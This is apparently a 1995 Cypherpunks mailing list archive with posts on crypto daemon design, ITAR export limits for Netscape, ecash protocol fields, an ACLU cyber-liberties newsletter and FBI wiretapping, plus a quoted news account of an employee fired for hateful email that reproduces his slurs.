the problem with a user invoked slave process via a socket mechanism is the same as with a .dll or linkable library: the application needs to determine the authenticity of the single application socket. the system wide multi-process daemon has an advantage in one respect: it can only be loaded by the administrator, and as long as each invocation declares (and wipes at exit) its one memory allocation, including any pseudo-static variables --keep in mind that it must not be tied to the external tables. Therefore, in order to not be passing keys, passphrase, and all that good stuff across a lan, the daemon must be able to verify that the caller is literally local. This works even on diskless workstations as long as they have sufficient memory to support the application and the processes are specified non-swappable. <-attila > In retrospect, "daemon" was a poor choice of words to describe my > proposal. "Slave process" gets the idea across much better, but may be a > bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP > socket. The slave process is only accessible to the user who invoked it > (enforced by the OS's file permissions). Further, it only gives secrets to > individual processes that authenticated themselves first (by sending a > passphrase down the connection to the slave process). > > > > Once the negotiation has been established, the application can send > > >the daemon MIME objects that the app does not understand but the > > >daemon does (for example, an image/fractal). The daemon can return a > > >MIME object that the app does understand (for example, an image/ppm). > > > > This part sounds good...a sort of master translation service. > > I'm glad you like it! > the temptation here is to use plugins to reduce the load component. Again, you have the problem of tampered linkable libraries or .dlls. 
Secondly, the problem with diskless workstations rears up, again --the diskless workstations must obtain their loadable modules from the LAN/WAN unless RAM is infinite and everything is preloaded --except, here comes the LAN/WAN again before load. of course, both the basic daemon and all the loadable plugins can also be encrypted with the header containing at least lateral and linear checksums, if not polynomial check subroutines for authentication. in both cases, the base daemon must verify the authenticity which means it needs a system manager modifiable list table. the use of public/private key pairs which can be modified for each site by a system manager with either a special routine or a debugger, provides an additional level of security. although you could enable a similar service between the daemon and the calling module using DH for each "session," thereby making it even harder for an interloper to monitor any IPC connections, even if LAN/WAN usage was permitted under these conditions --just how far do you want or need to push the limits of "secure." I'll answer that the usual way for anyone who has written code, let alone secure code or crypto --to the max --better snooping tools are always around the corner (it's just like the arms race). --and, there is always the wrapper approach on top of this. > > > Alternatively, the daemon may request an authentication. This is > > >useful when resolving external bodies that require authentication, > > >including non-anonymous FTP, and standard authenticated HTTP. In this > > >case, the daemon sends a message to the app requesting the > > >authentication. It specifies whether it needs both username and > > >password, or just password. In the latter case, it hands a username to > > >the application. > > > The application can then query the user for the authentication > > >data. It hands this back to the daemon. In reply, the daemon indicates > > >success or failure. 
In case of success, it hands the object back to > > >the app. > > > > Now I get worried. This communication with the demon is via some IPC -- > > maybe even via a LAN. Some things can't be distributed safely and > > authentication is #2 on my list. > > No, the communication is not via a LAN. On a Unix system, the > communication is through Domain Sockets. Both processes live on the same > machine, and the socket "lives" on the local file system. > No, that is not always true; again, user space sockets present the same security risk as loadable modules unless you have a base socket which decrypts and authenticates each loadable module. And, user sockets are more easily attacked. > I submit that my proposal is every bit as secure as, say, PGP is now. > If you can't trust the operating system not to hand domain sockets from > one process to another, then you certainly can't trust it to, for > example, substitute different binaries for the crypto program (an attack > which Ian et al cleverly mounted a few weeks ago). > If it were not the case that my proposal was as secure as PGP, then I > would want to withdraw it. However, the proposal has so many advantages > that I would want to see a serious description of the attack, rather than > just feelings of endangerment to Will Robinson. > > > > Encryption is a bit more tricky, but in essence you just hang a > > >premail-alike off this kind of protocol. The hard part is specifying > > >the key, but you just call it a "parameter" and put in hooks for the > > >daemon to ask for whatever parameters it needs. > > > > Crypto keys are #1 on my list of things you can't distribute (unless they > > are wrapped, of course). > > I should have made it clearer that I am referring to public keys. If > public keys are on the list of things that can't be distributed, then I > believe we are in trouble. 
> in order for a "user" to decrypt public key paired messages, the user's private key must be passed to the daemon --obviously in a secure packet which again can be initiated with DH; the alternative is a lookup from a standardized location such as ~/.private/ring which can be non-readable except by the owner or by the daemon running suid as the user at the authentication level. Personally, I would rather pass the private key from the user module interface in an authentication packet and not have it necessarily visible --the same goes for the pass phrase. this checking and rechecking may be necessary for maximum security on a multi-user machine, but you may have more authentication overhead than translation overhead in a short packet... and, what do you do with MickeySoft? with as much 3.1 base code as there appears to be from the complaints, W95 looks like a problem for multi-process packetizing, etc. Maybe NT is better? I do not use either and will stay with some form of BSD (Solaris and FreeBSD currently). I may be the last holdout on earth as the posting yesterday detailed, but I will be a holdout. > > > This requires that > > >keys have some nonforgeable names, which is unfortunately not a > > >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the > > >Certification Authority ( at Nick Szabo). > > > > Public keys, if that's what you're talking about, have perfectly good > > nonforgeable names -- themselves. They are unique. They are the proper > > name which can collect all the attributes of that key which are of interest > > (e.g., permission to spend $, name of a human who knows the private key, > > attributes about that human, etc.). > > Ok. But public keys have one serious disadvantage: their size. I can't > put a public key on my business card or read it over the phone. I want a > unforgeable key name. I want this to be the standard key name in the > interface between the application and the crypto engine. 
I want users to > be able to specify them directly, at the very least to bootstrap the > public key infrastructure. > I propose using the MD5 hash of the whitespace-free MOSS > representation of the public key, in hex. It's simple enough to be > described in one sentence, but does everything I want. > there is nothing that says you can not use a 64 or 128 bit public key; nothing says you must use 1024 bits for the public. the fact the private key is 1024 bits is irrelevant other than the fact it increases security. there are some advantages of simplicity for simplicity's sake! :) > Note that PGP 2.6.2 does _not_ allow the use of a public key as the > name of a public key, unless you do a horrible hack such as replace the > pubring.pgp file with the one public key of interest. This is a > significant problem when trying to identify which key signed a signed > message. I haven't bashed around with TISMOSS enough, but I'm not sure it > will allow this either. I got the impression that it preferred the use of > an alias. > > > > One final aside: I've been fairly frustrated with this mailing list > > >as a forum for talking about real design proposals and implementation > > >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless > > >tend to attract far more attention than real crypto work. I want a > > >forum for, and just for, cypherpunks who write code. If I had just a > > >smidgen more free time (as if), I'd be trying to start one > > >myself. Anyone else? > > for a man with a piled higher and deeper, Dr. Fred's spelling and grammar skills are quite poor, maybe 8th grade. we don't need to deal with the pompous holier than thou attitude from anyone. I too have a piled higher and deeper in information techniques (which includes security). what's it worth? Not much if you can not support it with your actions and accomplishments. ...just open your mouth Dr. Fred so we can check your IQ (Ignorance Quotient!). > > I've seen this happen several times. 
As a list gets popular, it > > diversifies. You might try sci.crypt.research -- since it's moderated. > > Thanks for the suggestion. However, my concerns are with > implementation and deployment, not research. I am perfectly willing to > consider cryptographic algorithms to be black boxes that do what they say > they will. I think the charter exists to start a new list. John Gilmore > has already offered to start a "coderpunks" list on toad.com. Shall we > take him up on it? > > Raph > The problem with a new list is that we really need a moderated list; the condition being that all messages dealing with code pass if you are a member, but no one should be discriminated against membership --no politics, not even the alerts which we really should be aware of as public "policy" (if you can call it that) does concern how we approach crypto in general. sci.crypt.research is a little more technical than it needs to be and rarely has the give and take we have in this list --particularly when we are kicking around a proposal (like the universal translator of this thread). I would suggest that the code arguments be cross posted to the current list. we might find some interesting political considerations may lead to proposals for code. The problem is the moderator --who has the time? If not John Gilmore, maybe TCM??? I have more or less retired from active consulting and would do it if I were not overcommitted including some travel for the next several months --I do have a fast notebook, but toll charges are a bitch. It is important that there is "moderation" which blows away ideas despite personal bias and preference. One possible way to set the moderated list is to post as we always have to cypherpunks, and the moderator pops all the code related postings over to cypherpunks.moderated at toad.com (or wherever). This means the main list is complete, with the moderated list code limited. 
Once a message thread is identified, procmail would pick up the thread and forward it. .procmailrc commands could be handled automatically with a small script. Currently, after procmail breaks incoming into lists, I sort cypherpunks by subject and "pre-delete" all the noise discussions (other than a few like tcm or gilmore or perry, etc.). I could get nasty with a more aggressive procmail (mine only splits incoming into separate lists and wipes out Dr. Fred before it even gets to any list). Do a few of us wish to hash this problem out in email? Maybe we could swap the responsibility around when someone is out of town. Count me in, I'm all in favour of a moderated list with a reasonably controlled membership, not just a listproc or majordomo open subscribe function. From anonymous-remailer at shell.portal.com Wed Nov 22 15:58:12 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 23 Nov 1995 07:58:12 +0800 Subject: Junk E-Mail Message-ID: <199511220939.BAA22898@jobe.shell.portal.com> On Wed, 22 Nov 1995, James M. Cobb wrote: > 11 21 95 The Electronic Telegraph reports: > > THE European Parliament will decide today whether to > ban junk mail. This is not surprising coming from the Europeans. They tend to favour environmental conservation. I believe that Germany mandates, as an example, that a manufacturing company accept a return of its product for recycling at the cost of the manufacturer. Could you see GM or Ford actively supporting that type of program to deal with the trash problem?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jcobb at ahcbsd1.ovnet.com Wed Nov 22 16:02:40 1995 From: jcobb at ahcbsd1.ovnet.com (James M. 
Cobb) Date: Thu, 23 Nov 1995 08:02:40 +0800 Subject: Junk E-Mail - Part 3 Message-ID: Friend, An 11 21 95 Reuter Information Service newsstory, headed Computer illiterates offered new way onto Internet [OR: Junk mail wants to meet computer illiterate for safe sale] reports: Matsushita Electric Industrial Co said on Tuesday it had developed a way of accessing the Internet using the familiar telephone and fax machine.... With the Matsushita system, users can obtain an index via a facsimile machine and choose Internet subjects they are interested in by keying in numbers on their telephones.... The telephone and fax are connected to server computers.... Information coming back arrives as ordinary sound over the telephone handset or as printed text off the facsimile. AT&T was offering an index of newsstories in a series of ads in the Wall Street Journal a couple of years ago. You faxed the code numbers of the stories you wanted to read to AT&T; and AT&T faxed back the stories. FIRST RULE OF JUNK MAIL If you can sell it to the elite, you can sell it to the masses. Cordially, Jim NOTE. The NandO News website URL is: http://www.nando.net The newsstory's dateline: TOKYO (Nov 21, 1995 - 08:18 EST) Its online filename: info735_8.html From jcobb at ahcbsd1.ovnet.com Wed Nov 22 16:05:27 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Thu, 23 Nov 1995 08:05:27 +0800 Subject: Secrets of the Internet Message-ID: Friend, 11 21 95 Times of London screams that Pedophiles use encoding devices to make secret use of Internet Its newsstory reports an Interpol conference was told that International pedophile rings are borrowing an encryption system known as PGP -- Pretty Good Privacy -- developed in [where else!] America and Experts estimate that it could take 10 years for computer systems to crack the individual codes. 
If that's not enough to reduce you to jelly, Police [are] also concerned at the use of a "remailing" service being provided by an Internet expert in Finland who will take material sent to him and remove identification marks before sending it out again. On Monday, at the start of the two-day conference in London on crime against children, Detective Chief Inspector Bryan Drew of the UK's National Criminal Intelligence Service said ...although police increasingly realised the difficulties posed by the Internet...as yet no one in Britain had decided on a policy for dealing with them. and ...the Internet and computers were among a number [of] subjects being looked at by his unit. Interim measures for "dealing with" computers and the 'Net abound: As part of the Interpol work, a network of 64 liaison officers had been set up round the world to keep contact on investigations. And when the State ("no one") DECIDES...? Cordially, Jim NOTE. The NandO News website URL is: http://www.nando.net The newsstory's dateline is: LONDON (Nov 21, 1995 - 01:24 EST) Its online filename is: info429_4.html From dlv at bwalk.dm.com Wed Nov 22 16:09:34 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 23 Nov 1995 08:09:34 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: <9511220545.AA01344@zorch.w3.org> Message-ID: hallam at w3.org writes: > One point to be made is that at Universities we all have university accounts > because people realise that there is no connection between our views and > institute policy. The freedom to hold unpopular views being part of what > universities are all about. On the other hand there is no such assumption > concerning posts from foo.com. People who realize this, and use a University account to make "politically incorrect" statements, may be in for a rude surprise. Examples are posted way too frequently to alt.censorship. 
> On Phil Stromer, I don't think the Internet posts were the only point at issu > He was very offensive however, it was not merely the views he posted but the > manner in which he made them that caused offense. He also made a lot of > assertions concerning other posters which might have led to legal action > against Sun. It was definitely dumb of Stromer to have posted from a Sun account. However I'm sure that if he had posted from something like Netcom, and if he were known to work for Sun, some guardians of political correctness would have complained to Sun anyway. When I was in grad school, people used to complain to the grad school about my politically incorrect writings coming from this BBS, which is not affiliated with the school in any way (some of them were even forged :). Since I've bothered digging up the following quote, I might as well post it: ============================================================================ Philip H. Stromer: Contrib. post: He was another hate-filled bigot who posted rants about homosexuality. He became obsessed with the idea that anal sex would wear out the muscles of the digestive tract, causing incontinence; he also posted long gloating messages about "AIDS-infested faggots". Eventually, Sun Microsystems fired him for breach of contract, for posting messages which were intimidating and harassing to other employees. He sued them, and lost. Appeared again from some commercial site or other, but soon sunk out of view. A salutary lesson to those who believe that the Internet is a license to spew bigotry. -- Oh yeah. I've read this clown's rantings from time to time, and the one thing that occurs to me is that he and little Danny Karnes may be the same person. This isn't a _claim_ that they are, mind you, but you'd hardly know any better from their posts. 
-- (from the Business section of the San Jose Mercury News, Friday, July 31, 1992) "Email epithets spark Sun lawsuit" by Brandon Bailey By his own admission, Philip Stromer liked to push the boundaries of good taste when he sent out jokes and political statements on his employer's electronic mail network. But according to a lawsuit filed this week in Santa Clara County Superior Court, Stromer pushed too far. The 32-year-old technical writer says he was fired by Sun Microsystems in April after he sent a series of email messages that were anything but politically correct. The messages were posted on an electronic bulletin board used by Sun workers to exchange jokes and running commentary on a variety of topics unrelated to their jobs. "I was just trying to make conversation," Stromer said in an interview. "I would normally take whatever position was unpopular." His electronic broadsides ranged from pro-Israel and anti-abortion arguments to jokes about AIDS and graphic epithets about gays. Eventually he signed on to a nationwide computer network using his terminal at Sun and typed what he described as "some very extremely nasty stuff" on a bulletin board used primarily to exchange sarcastic insults and vitriolic humor. A Sun spokeswoman said the company would not comment. The case raises interesting questions about the increasing popularity of electronic bulletin boards and message systems on which users can type all kinds of outrageous statements without having to look their audience in the eye. Stromer says he always signed his own name to his messages and never meant to threaten anyone personally. But several legal experts say that anti-discrimination laws require management to step in when employees create an atmosphere that is hostile or intimidating to any group. "An occasional joke, maybe," said Patricia Shiu, staff attorney at the non-profit Employment Law Center in San Francisco. 
"But if an employer (allows) that kind of thing repeatedly, he exposes himself to liability for allowing a discriminatory environment." In his lawsuit, Stromer claims his bosses violated his right to free expression. He said he was just trying to liven up the conversations that Sun employees routinely conduct on a variety of email bulletin boards. And he compared himself with comedian Lenny Bruce. (Stromer said he had been scolded before but he drew his first written reprimand from Sun for a joke about AIDS and Magic Johnson, and another about AIDS and anal sex.) "This type of exchange... is deemed by Sun management to show poor judgment and blatant disregard for the feelings of coworkers," said the reprimand. By Stromer's account, he was fired after he used his work computer to hurl messages including graphic epithets at gays across a national network. The network automatically identified the messages as coming from a Sun computer. Stromer is acting as his own attorney. He said he sought help from the American Civil Liberties Union and a conservative foundation but both told him his employer had a right to regulate his speech on company computers. = = = [Typed in by sf at dec and reposted w/o his permission, which is why I'm leaving his name off / JBL] -- Aha. So _that's_ the reason he ceased to infest alt.flame! I just thought that his net access had been stripped, like a kook of a different stripe (I'm referring to the dreaded David J. Rasmussen, of course), but I probably just ran into his post-Sun output instead. One does wonder how working for a company justifies the posting of such crapola via a system the company owns. Ah well... ============================================================================ --- Dr. 
Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jsimmons at goblin.punk.net Wed Nov 22 16:18:09 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Thu, 23 Nov 1995 08:18:09 +0800 Subject: Spam the Sign! In-Reply-To: Message-ID: <199511230002.QAA01527@goblin.punk.net> > > >[regarding suggestion that netscape give mit or someone a 128 bit version > > >to place on an ftp server] > > > > > >This is not an apology for the ITAR, just my usual lawyerly overcaution: > > > > > >Suppose A gives B a program that is export controlled, intending for B to > > >allow it to be exported. Has A conspired with B to export the program? > > > > > >Let's ask the grand jury investigating Phil.... > > > > That's a possible problem, I suppose, but wouldn't you be protected if > > your license agreement with MIT (or whoever) specified redistribution > > "for domestic use only"? > > > "protected"? No. "Helped"? Yes. The government can argue to the jury > that the agreement was a sham and you knew it.... (Great, I'm about to argue law with a REAL LAWYER (tm). And they promised me that Cypherpunks wouldn't cause brain damage ... ) OK, suppose A does NOT intend for B to export it, and he does anyway ... Now suppose that instead of giving it to B, he SELLS it to him ... So a pirated copy of the commercial version of Netscape's Navigator shows up in a Hong Kong flea market, and Barksdale goes to jail ... (Members of the jury, Mr. Barksdale MUST have known that one of his millions of paying customers would export that dangerous munition ...) 
The logical ludicrousness of ITAR shows up fast no matter which angle you look at it from, and yet the people with the to actually challenge it aren't the big companies who stand to gain the most financially, it's a bunch of guys (a lot of whom hang around here sometimes) who are successfully giving away 'export controlled' software, while the people with the resources to really fight this thing sit on the sidelines waiting for Phil Zimmerman or Phil Karn to get them off the hook so they can go and make a lot of money. It seems to me that there's something very wrong with this picture, and while I don't mean this in any way to be taken personally, one of the big things I see as wrong is overcautious lawyers. -- Jeff Simmons jsimmons at goblin.punk.net From yihchun at u.washington.edu Wed Nov 22 16:46:54 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Thu, 23 Nov 1995 08:46:54 +0800 Subject: Q: Bookshop in Seattle In-Reply-To: <9511112134.AA29395@pulm1.accessone.com> Message-ID: This may be a bit late... I just picked it up from UBS for $49.95. It's ordered at B&N for $39.95 I think. On Sat, 11 Nov 1995 blancw at accessone.com wrote: > > Can someone point me towards a bookshop in Seattle that is likely to > have the second edition of Applied Cryptography ? > ....................................... > > Tower Books (I've seen it advertised there) > The University BookStore (probably) > Barnes & Noble (potentially) > > > .. 
> Blanc > > > +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +--------------------------------------------------------------------------+ From hfinney at shell.portal.com Wed Nov 22 17:24:23 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 23 Nov 1995 09:24:23 +0800 Subject: ecash protocol: Part 1 In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU> Message-ID: <199511230103.RAA15911@jobe.shell.portal.com> Ian Goldberg writes: >Last week, I was taking a look at the ecash protocol (no, I don't have a copy; >I have a binary, which I can't even run...). >I've managed to decipher a useful bit of the first message sent from >the shop to the payer. It's the Payment Request, and contains the following >information: >o Header identifying packet as Payment Request >o The integer 4 >o The payment amount, in cents >o The time (seconds since 1970) >o The integer 79 >o The name of the shop (payee) >o A description of the item being paid for >o An empty string >o The integer 0 >o End of Record marker That's very interesting work! What are the string formats, are they null terminated or Pascal-style with a preceding count byte? How did you identify "an empty string", wouldn't that just be a byte of 0? How did you know it was an empty string rather than just a 0. Did you get this by inducing a shop to send a payment request message to some program you wrote which was listening on the ecash port? I think a good way to get the rest of the information would be with a proxy which logged message traffic. I know ecash has some proxy support but I'm not sure how it works. 
There are SOCKS proxies and http proxies, and I don't know which it uses. I used a logging httpd proxy to derive the data for the SSL challenges I did this past summer. It might be interesting to post the binary data from some ecash transactions. >I guess the important bit is that the payee, the item being bought, >and the cost are sent _in the clear_. Some of the people I've talked >to think this is a huge privacy breach, and some don't. You all can >debate this now. Lucky can, if he wishes, add insight, and/or tell us >what DC may do about this. I wonder if it would be legal to write shop software which sent such a payment request, took the resulting coins, and deposited them in the bank (if we could figure out all the protocols necessary). This particular sequence of operations would not appear to infringe anybody's patents - there are no blinding operations involved. It's not clear how useful such a program would be but at least it would be one step away from the DigiCash monopoly. Hal From ACLUNATL at aol.com Wed Nov 22 17:34:39 1995 From: ACLUNATL at aol.com (ACLUNATL at aol.com) Date: Thu, 23 Nov 1995 09:34:39 +0800 Subject: ACLU Cyber-Liberties Update -- 11/22/95 Message-ID: <951122180144_114185619@mail06.mail.aol.com> ---------------------------------------------------------------- November 22, 1995 ACLU CYBER-LIBERTIES UPDATE A bi-weekly e-zine on cyber-liberties cases and controversies at the state and federal level. 
---------------------------------------------------------------- IN THIS ISSUE: * New York Civil Liberties Union Opposes Discipline of Cornell Students for Offensive Online Speech * Seattle Negotiates New Franchise Agreement with Cable Network to Offer Internet Access; ACLU of Washington Gives Testimony on Privacy Implications * Watch Out for Cyber-Liberties Infringements in Counter-Terrorism Legislation; House May Consider Bill in Early December * Update and ACTION ALERT on Federal Online Indecency Legislation * Online Discussion Groups on Electronic Access Issues ---------------------------------------------------------------- STATE PAGE (Legislation/Agency/Court Cases) ---------------------------------------------------------------- * New York Civil Liberties Union Opposes Discipline of Cornell Students for Offensive Online Speech The latest controversy over appropriate use of the Internet at universities erupted last week after four Cornell students made a list of "75 reasons why women should not have freedom of speech" and the list got loose on the Internet. Responding to e-mail and phone complaints about the message, Cornell considered disciplinary action against the students. The NYCLU wrote a letter to Cornell on Thursday, November 16th, urging Cornell not to proceed with disciplinary action. The letter said, "Freedom of expression, especially in the academic forum, is designed to encourage truth-seeking by protecting the challenge and response of intellectual discourse. . . . It is understandable that university officials should be concerned about the increase in the use of sexist language. . . . However, no matter how troubling or offensive the message is, the administration of Cornell University should not depart from principles of freedom of expression when addressing the issues surrounding this dispute." 
The letter went on to note that "the marketplace theory of free expression appears to be in full swing as the wrong-minded e-mail message has apparently already provoked thousands of angry messages' both to Cornell and to the particular four students." On Thursday afternoon, Cornell announced that it would not pursue any disciplinary action against the students. For a copy of the letter that NYCLU sent to Cornell, send a message to infoaclu at aclu.org with "NYCLU Letter to Cornell" in the subject line. For more information, contact Beth Haroules, Staff Attorney, NYCLU, at 212-382-0557. ---------------------------------------------------------------- * Seattle Negotiates New Franchise Agreement with Cable Network to Offer Internet Access; ACLU of Washington Testifies at Hearing on Privacy Implications Cities across the country are beginning to renegotiate franchise agreements with cable networks who want to get into the Internet access business. Civil libertarians must work to ensure that strong privacy protections are included in these agreements. The City of Seattle is currently negotiating a new franchise agreement with TCI of Seattle, Inc., and the ACLU of Washington urged the city to include provisions to protect consumer privacy. In a letter dated November 9th, ACLU-W said that "franchisees should be prohibited from collecting any data on individual use of the cable network, including Internet access, except that data minimally needed for billing purposes. . . . [T]he franchisee should be precluded from collecting information about which other Internet sites are accessed through the cable network, which newsgroups are read, which real-time interactive forums are participated in, or any other information that could be used to compile a data profile of the subscriber." The letter also urged the city to require technological protections, like encryption, to guard against unauthorized tapping. 
For a copy of the letter, send a message to infoaclu at aclu.org with "cable franchise agreement" in the subject line. For more information, contact Doug Klunder, ACLU-W Information Technology Committee, dougk at eskimo.com. ---------------------------------------------------------------- FEDERAL PAGE (Congress/Agency/Court Cases) ---------------------------------------------------------------- * Watch Out for Cyber-Liberties Infringements in Counter-Terrorism Legislation; House May Consider Bill in Early December The House of Representatives is scheduled to debate a broad counter-terrorism bill in early December. (The Senate passed a similar bill in June 1995.) While the counter-terrorism bill contains many unconstitutional provisions, the net community should be particularly alert to the following: 1. The pending House counter-terrorism bill contains a funding mechanism for vastly expanded wiretap capabilities for federal law enforcement (authorized by the Digital Telephony law passed by Congress last year). The FBI's scheme would give government an unprecedented ability to intrude on privacy through increased wiretaps. The net community should oppose this and any other funding scheme for the FBI's wiretap proposal. (See our 11/8 issue of the Cyber-Liberties Update for an ACLU statement and action alert on the federal wiretap proposal.) 2. The version of counter-terrorism legislation already passed by the Senate contains a revised Feinstein Amendment, which makes it a felony "to distribute by any means information pertaining to, in whole or in part, the manufacture of explosive materials, if the person intends, or knows that such explosive materials or information will likely be used for" criminal purposes. While the legislation applies to all media, it grew out of Senator Feinstein's vilification of the Internet at the Senate's May 11th counter-terrorism hearings. 
The House version of counter-terrorism legislation does not currently contain language like the Feinstein Amendment, but the online community should stand ready to oppose any effort to include such unconstitutional provisions in the final House bill. For a copy of the ACLU's letter to the Senate in opposition to the original Feinstein Amendment, send a message to infoaclu at aclu.org with "Feinstein Amendment" in the subject line. For further information on the ACLU's opposition to counter-terrorism legislation (which would also expand the FBI's powers in electronic surveillance and other areas), visit the ACLU's Constitution Hall on America Online, at keyword ACLU. ---------------------------------------------------------------- * Update and ACTION ALERT on Federal Online Indecency Legislation The Conference Committee on the telecommunications bill is currently considering whether to remove provisions that would make "indecency" and other speech a crime in cyberspace. The Christian Coalition and other anti-free-speech groups continue to heavily lobby the Conferees to make the new speech crimes even stricter than the Exon Amendment. To counter this backlash, the online community must overwhelm the Conference Committee with a loud and clear message -- that parental empowerment tools and not big government censorship are the only effective means to address children's access to online content. While the Conference Committee is home for Thanksgiving, we urge you to call the Conferees in your state. To find a list of the home office phone numbers for the Conferees, see the current ACTION ALERT at http://www.vtw.org/ The ACLU continues to prepare for a constitutional challenge to the online censorship provisions if they become law. Please contact Ann Beeson, beeson at aclu.org, if your organization is interested in being a plaintiff in this ground-breaking litigation that will define First Amendment rights in cyberspace. 
---------------------------------------------------------------- Online Discussion Groups on Electronic Access Issues ---------------------------------------------------------------- The following discussion groups are actively debating government information and access issues: GOVPUB -- issues related to publishing local and state government information online Subscribe: listserv at vm1.nodak.edu Message: subscribe govpub GOVACCESS -- citizen access to government information Subscribe: majordomo at well.dom Message: subscribe govaccess PUBPOL-D -- substantive discussion of public policy issues Subscribe: listserv at vm1.spcs.umn.edu Message: subscribe pubpol-d [your name] COMMUNET -- issues related to community and civic networks Subscribe: listserv at uvmvm.uvm.edu Message: subscribe communet [your name] ---------------------------------------------------------------- ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE ---------------------------------------------------------------- Stay tuned for news on the ACLU's world wide web site, under construction at http://www.aclu.org. America Online users should check out our live chats, auditorium events, *very* active message boards, and complete news on civil liberties, at keyword ACLU. ---------------------------------------------------------------- ACLU Cyber-Liberties Update Editor: Ann Beeson (beeson at aclu.org) American Civil Liberties Union National Office 132 West 43rd Street New York, New York 10036 To subscribe to the ACLU Cyber-Liberties Update, send a message to infoaclu at aclu.org with "subscribe Cyber-Liberties Update" in the subject line of your message. To terminate your subscription, send a message to infoaclu at aclu.org with "unsubscribe Cyber-Liberties Update" in the subject line. For general information about the ACLU, write to infoaclu at aclu.org. 
---------------------------------------------------------------- From rsalz at osf.org Wed Nov 22 17:35:26 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 23 Nov 1995 09:35:26 +0800 Subject: "The Right To Privacy" by Caroline Kennedy, et. al. Message-ID: <9511220155.AA28801@sulphur.osf.org> I've heard a couple of media interviews (CNBC Equal Time, and NPR Talk of the Nation). It sounds like a good collection of issues and scare stories. Experienced people on this list might learn a few things to round out the overall picture, but it's probably best for the general public. I hope it does real well. From perry at piermont.com Wed Nov 22 17:36:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 23 Nov 1995 09:36:51 +0800 Subject: Pedophiles use encoding devices to make secret use of Internet In-Reply-To: Message-ID: <199511220307.WAA18256@jekyll.piermont.com> Weld Pond writes: > [ Pedophiles use encoding devices to make secret use of Internet ] > Story in Nando Times > > http://www2.nando.net/newsroom/ntn/info/info429_4.html Somewhat inevitable. Doubtless it will be used by the FBI and others as ammo. Perry From jsw at netscape.com Wed Nov 22 17:43:43 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 23 Nov 1995 09:43:43 +0800 Subject: Spam the Sign! In-Reply-To: <199511210121.RAA02291@goblin.punk.net> Message-ID: <30B28651.57A@netscape.com> sameer wrote: > > > > > And as far as needing government approval, I noticed that Sameer has an > > export controlled ftp server at c2.org. Maybe he could tell us what is > > necessary to setup such an animal. > > > > -- > > I do what RSADSI does with ftp.rsa.com. It requires a cronjob > and sed. I didn't get the NSA to approve it, but I figure if it's good > enough for RSADSI it's good enough for me. Do you have a legal opinion to support this statement? 
Our lawyers tell us that executives of netscape could go to jail if we make the 128bit version of netscape available from an "export controlled" ftp or http server. We are working to clarify the situation with the government or figure out an alternative distribution scheme that will remove us from the grey area. Getting the US version of netscape widely available is one of my highest priorities, but I can't tell Barksdale that he should go to jail over it. I'm constantly pushing from within the company to keep things moving forward. In the mean time I apologize to the linux users who can't even buy the 128 bit version. If something changes on this front I'll be sure to let people know. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Wed Nov 22 17:48:11 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 23 Nov 1995 09:48:11 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? In-Reply-To: Message-ID: <199511220216.VAA18082@jekyll.piermont.com> Timothy C. May writes: > At 4:05 PM 11/21/95, Peter Wayner wrote: > >Has anyone ever done the math on the FBI's new wire tapping > >proposals and determined whether they'll have enough agents to > >do all of the listening?> ... > > The manpower shortage can be solved by moving the listening step offshore, > perhaps to one of the Caribbean islands that processes credit card slips. Am I the only person who thought that the point was to be able to selectively target certain areas but not necessarily all areas? For instance, let's say the known criminal Tim May is going to be in some place for a while -- by conducting roving taps of all conversations, I can find him. 1% capacity should be enough to make that practical. 
As another example, let's say there is some sort of political insurgency building up in some city -- presumably, one could devote all one's roving manpower to just that place for a few weeks and crush it. I can see no conventionally legitimate need or way to exploit the capability, but with unconventional and illegitimate techniques... Perry From hallam at w3.org Wed Nov 22 17:51:45 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 23 Nov 1995 09:51:45 +0800 Subject: "Dear Newt" Letter... In-Reply-To: <199511220100.UAA17883@jekyll.piermont.com> Message-ID: <9511220208.AA29462@zorch.w3.org> >And what did any of the Democrats do? >Anyone who thinks that Democrats are "better" for privacy and personal >freedom than Republicans has probably been taking very high quality >drugs indeed. A Democratic president has been pushing Clipper -- >Senator Exon is a Democrat. Yes and Coates is a Republican, Meanwhile Grassley and Dole have a parallel set of lossage. Incidentally on the Exon-Coates amendment, look into the connections between Rimm and the Christian right. The legal footnotes were apparently drafted by legal counsel for the Christian Coalition. Granted there are few friends of the Christian Right's manifesto on the Internet, I personally consider them an entryist group which the Republicans should recognise as a liability. The point was that the original post made the assumption that the Republicans were somehow differentiated from the Democrats on this. It's simply not true. Clipper was started under Bush (or possibly Reagan) and Clinton carried it over without change. I don't see any sign at present that a Republican president wouldn't simply continue as well. The only way something is going to get done is if the Clipper program gets labeled with the "take out with the trash" tag. 
